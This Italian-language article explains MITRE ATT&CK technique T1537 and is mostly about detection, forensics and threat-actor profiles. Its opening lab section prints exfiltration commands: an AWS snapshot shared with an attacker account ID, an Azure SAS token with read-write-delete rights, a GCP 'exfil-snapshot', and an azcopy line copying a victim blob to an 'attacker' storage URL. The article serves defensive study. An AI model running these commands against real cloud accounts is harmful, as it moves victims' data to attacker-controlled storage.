Trasferimento Dati tra Account Cloud: Transfer Data to Cloud Account (T1537)

Per replicare questa tecnica in laboratorio, iniziamo con AWS. Il primo step consiste nel creare uno snapshot di un'istanza EC2 contenente dati sensibili simulati.

aws ec2 create-snapshot --volume-id vol-12345678 --description "Backup produzione"

Una volta creato lo snapshot, lo condividiamo con un account AWS controllato dall'attacker:

aws ec2 modify-snapshot-attribute --snapshot-id snap-87654321 --attribute createVolumePermission --operation-type add --user-ids 123456789012

In Azure, l'approccio più subdolo utilizza i SAS URI. Generiamo prima un token SAS per un blob storage contenente i dati target. Il comando PowerShell diventa:

$context = New-AzStorageContext -StorageAccountName "victimaccount" -StorageAccountKey "key" New-AzStorageBlobSASToken -Container "sensitive" -Blob "data.zip" -Context $context -Permission rwd -ExpiryTime (Get-Date).AddDays(7)

Per Google Cloud Platform, sfruttiamo le funzionalità di condivisione cross-project. Prima creiamo uno snapshot del disco:

gcloud compute disks snapshot victim-disk --snapshot-names exfil-snapshot --zone us-central1-a

Poi lo condividiamo con il progetto controllato dall'attacker modificando le IAM policy dello snapshot.

Storm-0501 ha dimostrato l'efficacia di AzCopy per trasferimenti massivi. Il tool Microsoft legittimo diventa un'arma nelle mani sbagliate:

azcopy copy "https://victim.blob.core.windows.net/data?SAS_TOKEN" "https://attacker.blob.core.windows.net/stolen" --recursive

Gli strumenti come Megasync utilizzati da INC Ransom offrono un'alternativa quando i trasferimenti cloud-to-cloud sono bloccati. L'automazione tramite megatools permette upload massivi verso Mega.nz mantenendo l'anonimato.

La detection efficace richiede visibilità cross-platform su AWS CloudTrail, Azure Activity Log e Google Cloud Audit Logs. Il primo indicatore critico è la modifica delle permission di snapshot o backup.

Monitora gli eventi ModifySnapshotAttribute in CloudTrail con particolare attenzione al parametro UserIds che indica condivisione con account esterni. Un alert deve scattare quando:

• Uno snapshot viene condiviso con un account non nella whitelist aziendale
• Il volume dello snapshot supera 10GB (parametro configurabile)
• L'intervallo tra creazione e condivisione è inferiore a 15 minuti

Per Azure, l'analytic AN1580 rileva la generazione di SAS URI attraverso i log di Azure Monitor. I falsi positivi si riducono implementando una baseline dei domini partner autorizzati. Ogni generazione di link anonimo o condivisione verso tenant non verificati deve generare un alert immediato.

Office 365 presenta sfide uniche. L'analytic AN1581 sui log unificati M365 traccia le condivisioni OneDrive verso domini esterni. La chiave sta nel correlare:

• Accesso a file sensibili (classificati con sensitivity label)
• Generazione di sharing link entro 30 minuti dall'accesso
• Domini destinatari non presenti nella lista partner

Per ridurre il rumore, implementa una logica di esclusione per le condivisioni interne all'organizzazione e quelle verso domini di collaboratori noti. RedCurl ha dimostrato che anche servizi SaaS come Google Drive possono essere weaponizzati, quindi l'analytic AN1582 deve coprire anche queste piattaforme.

I VPC Flow Logs in AWS forniscono contesto aggiuntivo mostrando volumi di traffico anomali tra VPC in region diverse, indicatore di possibili trasferimenti massivi tra account.

La ricostruzione forense inizia dall'identificazione degli snapshot o backup creati nel periodo sospetto. In AWS, CloudTrail mantiene traccia completa delle operazioni EC2 e S3.

Cerca nel CloudTrail gli eventi CreateSnapshot seguiti da ModifySnapshotAttribute. La timeline tipica mostra:

1. Reconnaissance sui volumi EBS disponibili
2. Creazione snapshot dei volumi contenenti dati critici
3. Modifica delle permission per condivisione cross-account
4. Cancellazione dello snapshot originale dopo il trasferimento

In Azure, i log di Activity forniscono dettagli su ogni operazione blob storage. Gli artefatti chiave includono:

• Eventi Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
• Generazione di SAS token (Microsoft.Storage/storageAccounts/listAccountSas/action)
• Trasferimenti tramite AzCopy visibili nei log di Storage Analytics

La presenza di megatools lascia tracce distintive nel filesystem. Cerca in:

• ~/.megarc per configurazioni salvate
• /tmp/.megasync/ per file temporanei di upload
• Log di sistema per connessioni HTTPS verso mega.nz

Per Google Cloud, la Cloud Audit Log API registra ogni operazione su snapshot e condivisioni IAM. La sequenza forense tipica rivela:

1. Enumerazione dischi tramite compute.disks.list
2. Creazione snapshot con compute.snapshots.insert
3. Modifica IAM policy con setIamPolicy
4. Accesso allo snapshot dal progetto attaccante

L'analisi dei VPC Flow Logs può rivelare pattern di trasferimento dati tra subnet in account diversi, specialmente quando correlata con i timestamp delle operazioni snapshot.

INC Ransom rappresenta l'evoluzione del ransomware verso tecniche di doppia estorsione. Il gruppo utilizza Megasync per garantire che i dati siano al sicuro prima di cifrare i sistemi vittima. Pattern identificativi:

• Preferenza per vittime con infrastrutture cloud mature
• Upload verso Mega.nz in orari notturni del fuso orario vittima
• Volumi di trasferimento tra 50-500GB per evitare detection

RedCurl dimostra sofisticazione superiore nell'uso di cloud storage legittimi. Il gruppo russo-parlante opera principalmente contro organizzazioni finanziarie in Europa dell'Est. Caratteristiche distintive:

• Utilizzo esclusivo di megatools da sistemi Linux compromessi
• Preferenza per Google Drive e Mega come destinazioni
• Trasferimenti frazionati in file da massimo 100MB

Storm-0501 emerge come threat actor focalizzato su Azure. L'uso di AzCopy indica familiarità con l'ecosistema Microsoft e suggerisce possibili insider threat o compromissione di MSP. Indicatori comportamentali:

• Target primari: organizzazioni healthcare e governo USA
• Utilizzo di storage account in region Azure meno monitorate (Brazil South, Japan West)
• Trasferimenti durante weekend e festività

L'overlap negli strumenti è minimo, suggerendo che ogni gruppo ha sviluppato TTP specifiche. La tendenza emergente vede l'abbandono di C2 tradizionali a favore di servizi cloud legittimi per l'esfiltrazione.

Le previsioni indicano evoluzione verso:

• Utilizzo di servizi cloud regionali (Alibaba Cloud, Yandex.Cloud)
• Automazione tramite Infrastructure-as-Code per creare account di esfiltrazione
• Sfruttamento di free tier per ridurre tracciabilità finanziaria

Framework MITRE ATT&CK documenta questa tecnica come T1537. I casi di INC Ransom, RedCurl e Storm-0501 forniscono esempi concreti di implementazione. Microsoft Sentinel e AWS GuardDuty offrono detection rule specifiche per questa tecnica.